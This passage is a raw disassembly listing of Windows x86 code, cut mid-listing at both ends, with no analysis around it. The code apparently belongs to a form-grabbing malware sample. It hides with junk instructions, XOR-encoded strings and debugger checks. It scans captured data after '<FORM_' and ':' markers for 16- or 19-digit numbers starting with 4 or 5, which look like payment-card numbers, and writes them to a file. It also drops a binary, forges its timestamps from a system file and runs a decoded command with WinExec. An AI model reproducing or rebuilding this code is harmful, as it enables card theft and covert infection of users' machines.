call strcat ; strcat
add esp, 18h
mov eax, dword_442421
mov [ebp+var_52667], eax
cmp MultiByteStr, 68h
jnz short loc_407BFA
cmp byte_41FB11, 74h
jnz short loc_407BFA
cmp byte_41FB12, 74h
jnz short loc_407BFA
cmp byte_41FB13, 70h
jz short loc_407BFF
loc_407BFA: ; CODE XREF: sub_406D2E+EAF�j
; sub_406D2E+EB8�j ...
jmp loc_407D3D
; ---------------------------------------------------------------------------
loc_407BFF: ; CODE XREF: sub_406D2E+ECA�j
call GetVersion ; GetVersion
push 8 ; Size
push offset word_446EC2 ; Src
call sub_406CA2
mov edi, 9
sub edi, dword_4423A4
push edi
push eax
push offset MultiByteStr
call sub_40181A
add esp, 14h
cmp eax, 0FFFFh
jz short loc_407C62
push 0Eh ; Size
push offset byte_446EB3 ; Src
call sub_406CA2
mov edi, 9
sub edi, dword_4423A4
push edi
push eax
push offset MultiByteStr
call sub_40181A
add esp, 14h
cmp eax, 0FFFFh
jz loc_407D3D
loc_407C62: ; CODE XREF: sub_406D2E+F01�j
call GetCurrentThreadId ; GetCurrentThreadId
mov [ebp+var_525EE], 0
loc_407C70: ; CODE XREF: sub_406D2E+FE1�j
mov eax, 13h
sub eax, dword_4423A8
push eax
movzx eax, [ebp+var_525EE]
lea eax, ds:4423B4h[eax]
push eax
push offset MultiByteStr
call sub_40181A
add esp, 0Ch
cmp eax, 0FFFFh
jz short loc_407CB8
call GetVersion ; GetVersion
push 1
lea eax, [ebp+var_2177D]
push eax
call dword_40F1D8
jmp loc_407D3D
; ---------------------------------------------------------------------------
loc_407CB8: ; CODE XREF: sub_406D2E+F6F�j
movzx eax, [ebp+var_525EE]
mov [ebp+var_52674], eax
lea ecx, ds:4423B4h[eax]
or eax, 0FFFFFFFFh
loc_407CCF: ; CODE XREF: sub_406D2E+FA6�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_407CCF
mov esi, [ebp+var_52674]
add esi, eax
mov edi, esi
mov [ebp+var_525EE], di
mov [ebp+var_52626], 4EA9h
add [ebp+var_52626], 266Bh
inc [ebp+var_525EE]
movzx eax, [ebp+var_525EE]
cmp byte_4423B4[eax], 0
jnz loc_407C70
call GetCurrentThreadId ; GetCurrentThreadId
push 0
lea eax, [ebp+var_2177D]
push eax
call dword_40F1D8
lea edi, [ebp+var_5266D]
lea esi, byte_442425
mov ecx, 3
rep movsw
loc_407D3D: ; CODE XREF: sub_406D2E:loc_407BFA�j
; sub_406D2E+F2E�j ...
mov [ebp+var_21788], 0
jmp short loc_407D74
; ---------------------------------------------------------------------------
loc_407D48: ; CODE XREF: sub_406D2E+1053�j
movzx edi, [ebp+var_21788]
cmp [ebp+edi*4+var_10FA4], 0
jz short loc_407D6D
movzx edi, [ebp+var_21788]
mov edi, [ebp+edi*4+var_10FA4]
push edi
mov edi, [edi]
call dword ptr [edi+8]
loc_407D6D: ; CODE XREF: sub_406D2E+1029�j
inc [ebp+var_21788]
loc_407D74: ; CODE XREF: sub_406D2E+1018�j
movzx eax, [ebp+var_21788]
movzx edx, [ebp+var_2]
cmp eax, edx
jl short loc_407D48
call GetVersion ; GetVersion
loc_407D88: ; CODE XREF: sub_406D2E+400�j
; sub_406D2E+E4F�j
cmp [ebp+var_525E4], 0
jz short loc_407D9D
mov eax, [ebp+var_525E4]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_407D9D: ; CODE XREF: sub_406D2E+1061�j
mov [ebp+var_5262C], 522Eh
inc [ebp+var_5262C]
cmp [ebp+var_52610], 0
jz short loc_407DC2
mov eax, [ebp+var_52610]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_407DC2: ; CODE XREF: sub_406D2E+1086�j
call GetProcessHeap ; GetProcessHeap
cmp [ebp+var_52608], 0
jz short loc_407DDC
mov eax, [ebp+var_52608]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_407DDC: ; CODE XREF: sub_406D2E+10A0�j
lea edi, [ebp+var_5266E]
lea esi, byte_44242B
xor ecx, ecx
inc ecx
rep movsb
loc_407DED: ; CODE XREF: sub_406D2E+227�j
cmp [ebp+var_52604], 0
jz short loc_407E02
mov eax, [ebp+var_52604]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_407E02: ; CODE XREF: sub_406D2E+130�j
; sub_406D2E+181�j ...
cmp [ebp+var_525FC], 0
jz short loc_407E17
mov eax, [ebp+var_525FC]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_407E17: ; CODE XREF: sub_406D2E+10DB�j
mov [ebp+var_5262D], 0FDh
add [ebp+var_5262D], 1
loc_407E25: ; CODE XREF: sub_406D2E+101�j
cmp [ebp+var_525F4], 0
jz short loc_407E3A
mov eax, [ebp+var_525F4]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_407E3A: ; CODE XREF: sub_406D2E+10FE�j
call GetVersion ; GetVersion
jmp loc_406D95
; ---------------------------------------------------------------------------
loc_407E44: ; CODE XREF: sub_406D2E+5C�j
pop edi
pop esi
pop ebx
leave
retn
sub_406D2E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; DWORD __stdcall StartAddress(LPVOID)
StartAddress proc near ; DATA XREF: sub_407F07+2C�o
var_20 = dword ptr -20h
var_1A = byte ptr -1Ah
var_19 = byte ptr -19h
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_44242C
push offset sub_40109A
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 10h
push ebx
push esi
push edi
mov [ebp+var_18], esp
call GetCurrentThreadId ; GetCurrentThreadId
mov [ebp+var_4], 0
mov [ebp+var_19], 9
movzx edi, [ebp+var_19]
mov esi, edi
add esi, edi
mov ebx, esi
mov [ebp+var_19], bl
loc_407E8C: ; CODE XREF: StartAddress+83�j
; StartAddress+A3�j
mov [ebp+var_1A], 0DFh
movzx edi, [ebp+var_1A]
mov esi, edi
add esi, edi
mov ebx, esi
mov [ebp+var_1A], bl
mov edi, dword_4423A4
add edi, 1ECh
push edi ; Duration
call _sleep ; _sleep
add esp, 4
call sub_406D2E
mov [ebp+var_20], 12EBh
add [ebp+var_20], 59A8h
cmp ThreadId, 0
jnz short loc_407E8C
jmp short loc_407EF5
; ---------------------------------------------------------------------------
mov [ebp+var_4], 0FFFFFFFFh
jmp short loc_407EF5
; ---------------------------------------------------------------------------
mov dword ptr [ebp-1Ch], 1
mov eax, [ebp-1Ch]
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
call GetVersion ; GetVersion
jmp short loc_407E8C
; ---------------------------------------------------------------------------
mov [ebp+var_4], 0FFFFFFFFh
loc_407EF5: ; CODE XREF: StartAddress+85�j
; StartAddress+8E�j
pop edi
pop esi
pop ebx
xchg eax, ecx
mov eax, [ebp+var_10]
mov large fs:0, eax
xchg eax, ecx
leave
retn 4
StartAddress endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407F07 proc near ; CODE XREF: sub_40AA24+7F9�p
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
lea edi, [ebp+var_2]
lea esi, dword_442438
xor ecx, ecx
inc ecx
rep movsb
mov eax, [ebp+arg_0]
mov dword_40F1D8, eax
mov ebx, 6DB8h
inc ebx
push offset ThreadId ; lpThreadId
push 0 ; dwCreationFlags
push 0 ; lpParameter
push offset StartAddress ; lpStartAddress
push 0 ; dwStackSize
push 0 ; lpThreadAttributes
call CreateThread ; CreateThread
mov ebx, eax
mov [ebp+var_1], 0E3h
add [ebp+var_1], 63h
push ebx ; hObject
call CloseHandle ; CloseHandle
call GetVersion ; GetVersion
pop edi
pop esi
pop ebx
leave
retn
sub_407F07 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push edi
call GetVersion ; GetVersion
cmp dword_442370, 0
jnz short loc_407F71
xor eax, eax
jmp short loc_407FB9
; ---------------------------------------------------------------------------
loc_407F71: ; CODE XREF: .text:00407F6B�j
call GetLastError
mov eax, dword_42FB14
cmp [ebp+8], eax
jz short loc_407F84
xor eax, eax
jmp short loc_407FB9
; ---------------------------------------------------------------------------
loc_407F84: ; CODE XREF: .text:00407F7E�j
call GetCurrentProcessId ; GetCurrentProcessId
lea ecx, MultiByteStr
or eax, 0FFFFFFFFh
loc_407F92: ; CODE XREF: .text:00407F97�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_407F92
mov edi, eax
add edi, 1
push edi
push offset MultiByteStr
push dword ptr [ebp+0Ch]
call memcpy ; memcpy
add esp, 0Ch
call IsDebuggerPresent ; IsDebuggerPresent
mov eax, 1
loc_407FB9: ; CODE XREF: .text:00407F6F�j
; .text:00407F82�j
pop edi
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_407FBC(void *Src, size_t Size)
sub_407FBC proc near ; CODE XREF: sub_408048+22E�p
var_4 = dword ptr -4
Src = dword ptr 8
Size = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov esi, [ebp+Size]
push esi ; Size
push [ebp+Src] ; Src
mov eax, dword_442444
lea eax, ds:415580h[eax]
push eax ; Dst
call memcpy ; memcpy
add esp, 0Ch
mov [ebp+var_4], 0D2h
xor edi, edi
jmp short loc_408003
; ---------------------------------------------------------------------------
loc_407FE9: ; CODE XREF: sub_407FBC+49�j
mov eax, dword_442444
add eax, edi
lea eax, ds:415580h[eax]
movsx edx, byte ptr [eax]
xor edx, 0FDh
mov [eax], dl
inc edi
loc_408003: ; CODE XREF: sub_407FBC+2B�j
cmp edi, esi
jl short loc_407FE9
mov eax, dword_442444
add eax, esi
mov byte ptr dword_415580[eax], 0
mov edi, dword_442444
add dword_442444, 3
mov eax, dword_442444
inc eax
add eax, esi
mov dword_442444, eax
cmp eax, 0DC5h
jle short loc_40803E
and dword_442444, 0
loc_40803E: ; CODE XREF: sub_407FBC+79�j
lea eax, dword_415580[edi]
pop edi
pop esi
leave
retn
sub_407FBC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_408048(LPCVOID lpBuffer)
sub_408048 proc near ; DATA XREF: sub_40AA24+7F4�o
var_2A = byte ptr -2Ah
NumberOfBytesWritten= dword ptr -24h
var_20 = dword ptr -20h
hObject = dword ptr -1Ch
var_18 = dword ptr -18h
var_13 = byte ptr -13h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_9 = byte ptr -9
var_8 = dword ptr -8
var_4 = dword ptr -4
lpBuffer = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2Ch
push ebx
push esi
push edi
mov [ebp+var_13], 0BEh
add [ebp+var_13], 3Fh
and [ebp+var_4], 0
and [ebp+var_8], 0
and [ebp+var_10], 0
loc_408065: ; CODE XREF: sub_408048+15E�j
; sub_408048+169�j ...
mov eax, [ebp+var_4]
mov edx, [ebp+lpBuffer]
cmp byte ptr [edx+eax], 3Ah
jnz loc_408179
mov [ebp+var_18], 723h
sub [ebp+var_18], 2278h
mov eax, [ebp+var_4]
mov edx, [ebp+lpBuffer]
cmp byte ptr [eax+edx+11h], 20h
jz short loc_40809B
cmp byte ptr [eax+edx+14h], 20h
jnz loc_408179
loc_40809B: ; CODE XREF: sub_408048+46�j
mov eax, [ebp+var_4]
inc eax
mov edx, [ebp+lpBuffer]
mov al, [edx+eax]
cmp al, 34h
jz short loc_4080B1
cmp al, 35h
jnz loc_408179
loc_4080B1: ; CODE XREF: sub_408048+5F�j
mov eax, [ebp+var_4]
add eax, 11h
mov edx, [ebp+lpBuffer]
cmp byte ptr [edx+eax], 20h
jnz short loc_4080C9
mov [ebp+var_8], 10h
jmp short loc_4080D0
; ---------------------------------------------------------------------------
loc_4080C9: ; CODE XREF: sub_408048+76�j
mov [ebp+var_8], 13h
loc_4080D0: ; CODE XREF: sub_408048+7F�j
mov [ebp+var_9], 0
xor ebx, ebx
jmp short loc_408150
; ---------------------------------------------------------------------------
loc_4080D8: ; CODE XREF: sub_408048+10B�j
call GetVersion ; GetVersion
cmp [ebp+var_8], 13h
jnz short loc_408119
mov eax, [ebp+var_4]
inc eax
add eax, ebx
mov edx, [ebp+lpBuffer]
cmp byte ptr [edx+eax], 2Dh
jnz short loc_408119
mov edi, 5
mov esi, ebx
inc esi
mov [ebp+hObject], edi
mov eax, esi
mov ecx, edi
xor edx, edx
div ecx
mov [ebp+var_20], eax
mov eax, edi
mov edi, [ebp+var_20]
mul [ebp+var_20]
mov [ebp+NumberOfBytesWritten], eax
mov edi, eax
cmp edi, esi
jz short loc_40814F
loc_408119: ; CODE XREF: sub_408048+99�j
; sub_408048+A8�j
call IsDebuggerPresent ; IsDebuggerPresent
mov eax, [ebp+var_4]
inc eax
add eax, ebx
mov edx, [ebp+lpBuffer]
mov al, [edx+eax]
cmp al, 30h
jl short loc_408132
cmp al, 39h
jle short loc_408134
loc_408132: ; CODE XREF: sub_408048+E4�j
jmp short loc_408179
; ---------------------------------------------------------------------------
loc_408134: ; CODE XREF: sub_408048+E8�j
movzx eax, [ebp+var_9]
mov edx, [ebp+var_4]
inc edx
add edx, ebx
mov ecx, [ebp+lpBuffer]
mov dl, [ecx+edx]
mov Format[eax], dl
add [ebp+var_9], 1
loc_40814F: ; CODE XREF: sub_408048+CF�j
inc ebx
loc_408150: ; CODE XREF: sub_408048+8E�j
cmp ebx, [ebp+var_8]
jb short loc_4080D8
mov eax, [ebp+var_8]
mov Format[eax], 0
call sub_40133B
or eax, eax
jz short loc_408170
call GetCurrentProcessId ; GetCurrentProcessId
jmp short loc_408179
; ---------------------------------------------------------------------------
loc_408170: ; CODE XREF: sub_408048+11F�j
mov [ebp+var_10], 1
jmp short loc_4081E7
; ---------------------------------------------------------------------------
loc_408179: ; CODE XREF: sub_408048+27�j
; sub_408048+4D�j ...
inc [ebp+var_4]
mov eax, [ebp+var_4]
mov edx, [ebp+lpBuffer]
cmp byte ptr [edx+eax], 0
jz short loc_4081E3
mov [ebp+var_12], 2C6Eh
movzx eax, [ebp+var_12]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_12], ax
mov eax, [ebp+var_4]
mov edx, [ebp+lpBuffer]
cmp byte ptr [edx+eax], 3Ch
jnz loc_408065
cmp byte ptr [eax+edx+1], 46h
jnz loc_408065
cmp byte ptr [eax+edx+2], 4Fh
jnz loc_408065
cmp byte ptr [eax+edx+3], 52h
jnz loc_408065
cmp byte ptr [eax+edx+4], 4Dh
jnz loc_408065
cmp byte ptr [eax+edx+5], 5Fh
jnz loc_408065
loc_4081E3: ; CODE XREF: sub_408048+13E�j
and [ebp+var_10], 0
loc_4081E7: ; CODE XREF: sub_408048+12F�j
cmp [ebp+var_10], 0
jz short loc_4081FC
mov eax, dword_42FB14
mov dword_43C21C, eax
jmp loc_4082A6
; ---------------------------------------------------------------------------
loc_4081FC: ; CODE XREF: sub_408048+1A3�j
call IsDebuggerPresent ; IsDebuggerPresent
push 0 ; hTemplateFile
push 0 ; dwFlagsAndAttributes
push 4 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 0 ; dwShareMode
push 40000000h ; dwDesiredAccess
push offset byte_40E080 ; lpFileName
call CreateFileA ; CreateFileA
mov [ebp+hObject], eax
mov [ebp+var_20], 7776h
add [ebp+var_20], 6412h
push 2 ; dwMoveMethod
push 0 ; lpDistanceToMoveHigh
push 0 ; lDistanceToMove
push eax ; hFile
call SetFilePointer ; SetFilePointer
call GetCurrentProcessId ; GetCurrentProcessId
mov eax, [ebp+lpBuffer]
mov ecx, eax
or eax, 0FFFFFFFFh
loc_408244: ; CODE XREF: sub_408048+201�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_408244
mov edi, eax
push 0 ; lpOverlapped
lea esi, [ebp+NumberOfBytesWritten]
push esi ; lpNumberOfBytesWritten
push edi ; nNumberOfBytesToWrite
push [ebp+lpBuffer] ; lpBuffer
push [ebp+hObject] ; hFile
call WriteFile ; WriteFile
lea edi, [ebp+var_2A]
lea esi, dword_442448
mov ecx, 6
rep movsb
push 2 ; Size
push offset byte_446EB0 ; Src
call sub_407FBC
add esp, 8
push 0 ; lpOverlapped
lea edi, [ebp+NumberOfBytesWritten]
push edi ; lpNumberOfBytesWritten
mov edi, 14h
sub edi, dword_442440
push edi ; nNumberOfBytesToWrite
push eax ; lpBuffer
push [ebp+hObject] ; hFile
call WriteFile ; WriteFile
call GetTickCount ; GetTickCount
push [ebp+hObject] ; hObject
call CloseHandle ; CloseHandle
loc_4082A6: ; CODE XREF: sub_408048+1AF�j
pop edi
pop esi
pop ebx
leave
retn
sub_408048 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4082AB(void *Src, size_t Size)
sub_4082AB proc near ; CODE XREF: sub_40833E+76�p
; sub_40844F+DE�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
Src = dword ptr 8
Size = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+Size]
mov [ebp+var_4], 0Dh
push esi ; Size
push [ebp+Src] ; Src
mov eax, dword_446458
lea eax, ds:40D000h[eax]
push eax ; Dst
call memcpy ; memcpy
add esp, 0Ch
xor edi, edi
jmp short loc_4082F0
; ---------------------------------------------------------------------------
loc_4082D9: ; CODE XREF: sub_4082AB+47�j
mov eax, dword_446458
add eax, edi
lea eax, ds:40D000h[eax]
movsx edx, byte ptr [eax]
xor edx, 3Ah
mov [eax], dl
inc edi
loc_4082F0: ; CODE XREF: sub_4082AB+2C�j
cmp edi, esi
jl short loc_4082D9
mov eax, dword_446458
add eax, esi
mov byte ptr dword_40D000[eax], 0
xor edi, edi
mov edi, dword_446458
inc dword_446458
mov eax, dword_446458
lea eax, [eax+esi+6]
mov dword_446458, eax
cmp eax, 0DFAh
jle short loc_40832D
and dword_446458, 0
loc_40832D: ; CODE XREF: sub_4082AB+79�j
mov [ebp+var_8], 337h
lea eax, dword_40D000[edi]
pop edi
pop esi
leave
retn
sub_4082AB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40833E(HANDLE hFile)
sub_40833E proc near ; CODE XREF: sub_40844F+90�p
var_22C = word ptr -22Ch
LastWriteTime = _FILETIME ptr -22Ah
LastAccessTime = _FILETIME ptr -222h
CreationTime = _FILETIME ptr -21Ah
var_212 = dword ptr -212h
Buffer = byte ptr -20Eh
var_109 = byte ptr -109h
var_108 = word ptr -108h
FileName = byte ptr -105h
hFile = dword ptr 8
push ebp
mov ebp, esp
sub esp, 22Ch
push esi
push edi
call GetTickCount ; GetTickCount
mov eax, dword_44645C
mov [ebp+var_212], eax
mov [ebp+var_108], 1671h
movzx eax, [ebp+var_108]
imul eax, 49FCh
mov [ebp+var_108], ax
push 104h ; uSize
lea eax, [ebp+Buffer]
push eax ; lpBuffer
call GetSystemDirectoryA ; GetSystemDirectoryA
mov [ebp+var_109], 7Ch
add [ebp+var_109], 1
lea eax, [ebp+Buffer]
push eax
lea eax, [ebp+FileName]
push eax
call sub_40C6D8
call GetVersion ; GetVersion
push 0Dh ; Size
push offset word_446EA2 ; Src
call sub_4082AB
push eax ; Source
lea esi, [ebp+FileName]
push esi ; Dest
call strcat ; strcat
add esp, 10h
push 0 ; hTemplateFile
push 0 ; dwFlagsAndAttributes
push 3 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 0 ; dwShareMode
push 80000001h ; dwDesiredAccess
lea eax, [ebp+FileName]
push eax ; lpFileName
call CreateFileA ; CreateFileA
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_40844B
call GetLastError
lea eax, [ebp+LastWriteTime]
push eax ; lpLastWriteTime
lea eax, [ebp+LastAccessTime]
push eax ; lpLastAccessTime
lea eax, [ebp+CreationTime]
push eax ; lpCreationTime
push edi ; hFile
call GetFileTime ; GetFileTime
lea eax, [ebp+LastWriteTime]
push eax ; lpLastWriteTime
lea eax, [ebp+LastAccessTime]
push eax ; lpLastAccessTime
lea eax, [ebp+CreationTime]
push eax ; lpCreationTime
push [ebp+hFile] ; hFile
call SetFileTime ; SetFileTime
push edi ; hObject
call CloseHandle ; CloseHandle
mov [ebp+var_22C], 0BCFh
movzx eax, [ebp+var_22C]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_22C], ax
loc_40844B: ; CODE XREF: sub_40833E+AB�j
pop edi
pop esi
leave
retn
sub_40833E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40844F proc near ; CODE XREF: sub_40AA24+8D�p
var_22B = byte ptr -22Bh
var_228 = byte ptr -228h
NumberOfBytesWritten= dword ptr -220h
var_21B = byte ptr -21Bh
Dest = byte ptr -218h
FileName = byte ptr -114h
var_108 = word ptr -108h
var_105 = byte ptr -105h
CmdLine = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 22Ch
push ebx
push esi
push edi
call GetVersion ; GetVersion
call GetVersion ; GetVersion
cmp eax, 80000000h
jnb loc_4085A0
lea edi, [ebp+FileName]
lea esi, dword_446460
mov ecx, 3
rep movsd
lea edi, [ebp+var_21B]
lea esi, byte_44646C
mov ecx, 3
rep movsb
push 0 ; hTemplateFile
push 0 ; dwFlagsAndAttributes
push 2 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 0 ; dwShareMode
push 40000000h ; dwDesiredAccess
lea eax, [ebp+FileName]
push eax ; lpFileName
call CreateFileA ; CreateFileA
mov ebx, eax
mov [ebp+var_108], 7171h
sub [ebp+var_108], 3D17h
push 0 ; lpOverlapped
lea eax, [ebp+NumberOfBytesWritten]
push eax ; lpNumberOfBytesWritten
push 4001h ; nNumberOfBytesToWrite
push offset word_44244E ; lpBuffer
push ebx ; hFile
call WriteFile ; WriteFile
push ebx ; hFile
call sub_40833E
call GetCurrentThreadId ; GetCurrentThreadId
push ebx ; hObject
call CloseHandle ; CloseHandle
lea edi, [ebp+var_228]
lea esi, byte_44646F
mov ecx, 2
rep movsd
lea edi, [ebp+var_22B]
lea esi, byte_446477
mov ecx, 3
rep movsb
push 104h ; uSize
lea eax, [ebp+CmdLine]
push eax ; lpBuffer
call GetSystemDirectoryA ; GetSystemDirectoryA
push 0Ah ; Size
push offset byte_446E97 ; Src
call sub_4082AB
lea edi, [ebp+CmdLine]
push edi
push eax ; Format
lea edi, [ebp+Dest]
push edi ; Dest
call sprintf ; sprintf
call GetCurrentThreadId ; GetCurrentThreadId
push 1Dh ; Size
push offset byte_446E79 ; Src
call sub_4082AB
push eax ; Source
lea edi, [ebp+CmdLine]
push edi ; Dest
call strcat ; strcat
add esp, 28h
call GetCurrentThreadId ; GetCurrentThreadId
lea eax, [ebp+Dest]
push eax ; lpFileName
call DeleteFileA ; DeleteFileA
mov [ebp+var_105], 45h
movzx eax, [ebp+var_105]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_105], al
push 0 ; uCmdShow
lea eax, [ebp+CmdLine]
push eax ; lpCmdLine
call WinExec ; WinExec
loc_4085A0: ; CODE XREF: sub_40844F+1B�j
pop edi
pop esi
pop ebx
leave
retn
sub_40844F endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov esi, [ebp+0Ch]
push esi
push dword ptr [ebp+8]
mov eax, dword_446504
lea eax, ds:432DD0h[eax]
push eax
call memcpy ; memcpy
add esp, 0Ch
mov dword ptr [ebp-4], 1E6h
xor edi, edi
jmp short loc_4085EB
; ---------------------------------------------------------------------------
loc_4085D4: ; CODE XREF: .text:004085ED�j
mov eax, dword_446504
add eax, edi
lea eax, ds:432DD0h[eax]
movsx edx, byte ptr [eax]
xor edx, 0Fh
mov [eax], dl
inc edi
loc_4085EB: ; CODE XREF: .text:004085D2�j
cmp edi, esi
jl short loc_4085D4
mov dword ptr [ebp-8], 237h
mov eax, dword_446504
add eax, esi
mov byte ptr dword_432DD0[eax], 0
xor edi, edi
mov edi, dword_446504
add dword_446504, 2
mov eax, dword_446504
add eax, 6
add eax, esi
mov dword_446504, eax
add dword_446504, 2
cmp dword_446504, 0DC4h
jle short loc_40863D
and dword_446504, 0
loc_40863D: ; CODE XREF: .text:00408634�j
mov dword ptr [ebp-0Ch], 65h
lea eax, dword_432DD0[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40864E(SIZE_T dwSize)
sub_40864E proc near ; CODE XREF: sub_408779+43�p
var_1 = byte ptr -1
dwSize = dword ptr 8
push ebp
mov ebp, esp
push ecx
call GetVersion ; GetVersion
push 4 ; flProtect
push 1000h ; flAllocationType
push [ebp+dwSize] ; dwSize
push 0 ; lpAddress
call VirtualAlloc ; VirtualAlloc
jmp short locret_40867B
; ---------------------------------------------------------------------------
mov [ebp+var_1], 3Fh
movzx eax, [ebp+var_1]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_1], al
locret_40867B: ; CODE XREF: sub_40864E+1A�j
leave
retn
sub_40864E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40867D(LPVOID lpAddress)
sub_40867D proc near ; CODE XREF: sub_408779+E6�p
lpAddress = dword ptr 8
push ebp
mov ebp, esp
call GetCurrentThreadId ; GetCurrentThreadId
push 8000h ; dwFreeType
push 0 ; dwSize
push [ebp+lpAddress] ; lpAddress
call VirtualFree ; VirtualFree
jmp short loc_40869B
; ---------------------------------------------------------------------------
call GetProcessHeap ; GetProcessHeap
loc_40869B: ; CODE XREF: sub_40867D+17�j
pop ebp
retn
sub_40867D endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 10h
push esi
push edi
mov esi, [ebp+0Ch]
mov dword ptr [ebp-4], 2A0h
push esi
push dword ptr [ebp+8]
mov eax, dword_446510
lea eax, ds:43A570h[eax]
push eax
call memcpy ; memcpy
add esp, 0Ch
mov dword ptr [ebp-8], 2B3h
xor edi, edi
jmp short loc_4086ED
; ---------------------------------------------------------------------------
loc_4086D3: ; CODE XREF: .text:004086EF�j
mov eax, dword_446510
add eax, edi
lea eax, ds:43A570h[eax]
movsx edx, byte ptr [eax]
xor edx, 0F6h
mov [eax], dl
inc edi
loc_4086ED: ; CODE XREF: .text:004086D1�j
cmp edi, esi
jl short loc_4086D3
mov dword ptr [ebp-0Ch], 25h
mov eax, dword_446510
add eax, esi
mov byte ptr dword_43A570[eax], 0
mov edi, dword_446510
inc dword_446510
mov eax, dword_446510
add eax, 5
add eax, esi
mov dword_446510, eax
cmp eax, 0E06h
jle short loc_408730
and dword_446510, 0
loc_408730: ; CODE XREF: .text:00408727�j
mov dword ptr [ebp-10h], 20Bh
lea eax, dword_43A570[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408741 proc near ; CODE XREF: sub_408779+103�p
var_4 = word ptr -4
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], 19C3h
sub [ebp+var_4], 4EAAh
push offset dword_4464BC
push offset dword_44647C
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40BC80
mov [ebp+var_1], 19h
movzx eax, [ebp+var_1]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_1], al
leave
retn
sub_408741 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_408779(void *Src, size_t Size, int)
sub_408779 proc near ; CODE XREF: sub_4098A8+4E0�p
var_71 = word ptr -71h
var_6F = byte ptr -6Fh
var_6C = dword ptr -6Ch
var_68 = byte ptr -68h
Buf1 = byte ptr -62h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
lpAddress = dword ptr -18h
Buf2 = byte ptr -14h
var_4 = dword ptr -4
Src = dword ptr 8
Size = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 74h
push ebx
push esi
push edi
mov ebx, [ebp+Src]
call GetProcessHeap ; GetProcessHeap
lea edi, [ebp+var_68]
lea esi, dword_446514
mov ecx, 3
rep movsw
call GetVersion ; GetVersion
mov eax, dword_44651A
mov [ebp+var_6C], eax
mov eax, [ebp+Size]
add eax, 40h
jge short loc_4087B3
add eax, 3Fh
loc_4087B3: ; CODE XREF: sub_408779+35�j
sar eax, 6
mov edi, eax
shl edi, 6
push edi ; dwSize
call sub_40864E
pop ecx
mov [ebp+lpAddress], eax
mov [ebp+var_22], 7A30h
sub [ebp+var_22], 748Fh
mov eax, [ebp+Size]
add eax, 40h
jge short loc_4087DC
add eax, 3Fh
loc_4087DC: ; CODE XREF: sub_408779+5E�j
sar eax, 6
mov edi, eax
shl edi, 6
push edi
push [ebp+lpAddress]
call RtlZeroMemory ; RtlZeroMemory
lea edi, [ebp+var_6F]
lea esi, word_44651E
mov ecx, 3
rep movsb
push [ebp+Size] ; Size
push ebx ; Src
push [ebp+lpAddress] ; Dst
call memcpy ; memcpy
add esp, 0Ch
mov [ebp+var_1C], 2FF0h
mov eax, [ebp+var_1C]
mov edx, eax
add edx, eax
mov [ebp+var_1C], edx
lea eax, [ebp+Buf2]
push eax
call sub_40BDBE
mov ebx, [ebp+lpAddress]
and [ebp+var_4], 0
jmp short loc_408849
; ---------------------------------------------------------------------------
loc_40882F: ; CODE XREF: sub_408779+E1�j
mov ax, word_446521
mov [ebp+var_71], ax
push ebx
lea eax, [ebp+Buf2]
push eax
call sub_40BDE5
add ebx, 40h
inc [ebp+var_4]
loc_408849: ; CODE XREF: sub_408779+B4�j
mov eax, [ebp+Size]
add eax, 40h
jge short loc_408854
add eax, 3Fh
